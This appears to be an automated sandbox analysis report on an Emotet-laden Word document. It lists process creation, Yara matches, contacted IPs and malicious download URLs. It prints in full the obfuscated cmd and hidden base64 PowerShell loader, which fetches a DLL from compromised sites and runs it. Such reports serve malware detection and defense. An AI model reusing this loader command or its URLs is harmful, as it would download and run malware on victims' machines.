Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
217.160.169.110	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
185.183.16.47	unknown	Spain	201453	AKIWIFIAKIWIFIES	true
51.255.203.164	unknown	France	16276	OVHFR	true
84.232.229.24	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	true
192.169.223.13	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true

Contacted Domains

Name	IP	Active
shannared.com	192.169.223.13	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://shannared.com/content/lhALeS/	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://3musketeersent.net/wp-includes/TUgD/	Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/	Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/	Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/	Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://3musketeersent.net/wp-includes/TUgD/	Virustotal: Detection: 8%	Perma Link
Source: https://skilmu.com/wp-admin/hQVlB8b/	Virustotal: Detection: 10%	Perma Link
Source: http://jeevanlic.com/wp-content/r8M/	Virustotal: Detection: 14%	Perma Link
Source: http://dashudance.com/thinkphp/dgs7Jm9/	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Kaktksw\An6othh\N49I.dll

ReversingLabs: Detection: 54%

Multi AV Scanner detection for submitted file

Source: ARCH_25_012021.doc	Virustotal: Detection: 16%			Perma Link
Source: ARCH_25_012021.doc	ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\Kaktksw\An6othh\N49I.dll

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 12.2.rundll32.exe.240000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 8.2.rundll32.exe.740000.1.unpack	Avira: Label: TR/ATRAPS.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_0028CC2A CryptDecodeObjectEx,

16_2_0028CC2A

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: shannared.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80

Networking:

